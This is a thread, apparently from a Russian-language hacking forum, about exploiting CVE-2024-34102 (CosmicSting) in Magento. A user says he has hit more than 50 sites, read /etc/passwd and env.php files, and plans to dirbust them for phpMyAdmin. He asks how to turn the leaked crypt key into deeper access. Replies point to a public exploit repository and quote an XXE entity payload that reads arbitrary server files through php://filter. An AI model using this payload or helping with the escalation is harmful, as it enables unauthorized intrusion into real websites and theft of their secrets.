• XSS.stack #1 – первый литературный журнал от юзеров форума

CVE-2024-34102

Отслеживать
MrMischief

MrMischief

HDD-drive
Пользователь
Регистрация
21.05.2023
Сообщения
20
Реакции
7
EN:
I have a 50+ sites which I have tested this CVE on.
I can get the env.php files as a minimum. I will be dirbusting them to check for phpmyadmin and stuff.
Any other ways I can gain access from this?

RU (translated):
У меня есть более 50 сайтов, на которых я протестировал этот CVE.
Я могу получить файлы env.php как минимум. Я буду их перебирать, чтобы проверить phpmyadmin и прочее.
Есть ли другие способы получить доступ отсюда?
 
narow71 сказал(а):
github.com

GitHub - Chocapikk/CVE-2024-34102: CosmicSting (CVE-2024-34102)

CosmicSting (CVE-2024-34102). Contribute to Chocapikk/CVE-2024-34102 development by creating an account on GitHub.
github.com
I have used a script like that to test it and get files back I have tested each site. But once I get say the env.php file what do I do then to get more access ?
I have tested it to get the /etc/password and ../app/etc/env.php files. But then what with the crypt key?
 
sysnoob сказал(а):
so basically this CVE is XXE exploit in case there is a vulnerable xml you can use it for server side requests but it wouldn't break crypt keys or anything else.
what do you need exactly finding crypto key or breaking them ?
so the vulnerability leads to LFI

XML: 
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource={FILE}">
....


so when i do say ../app/etc/env.php, it will contain this key

PHP: 
'crypt' => array (
    'key' => 'ea3c765b042b9e0460c882849bf80a1d',
  ),

Can I then use this key in anyways to get access or anything? Or any other important files I can get using it?
This is the default env.php file layout env.php
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх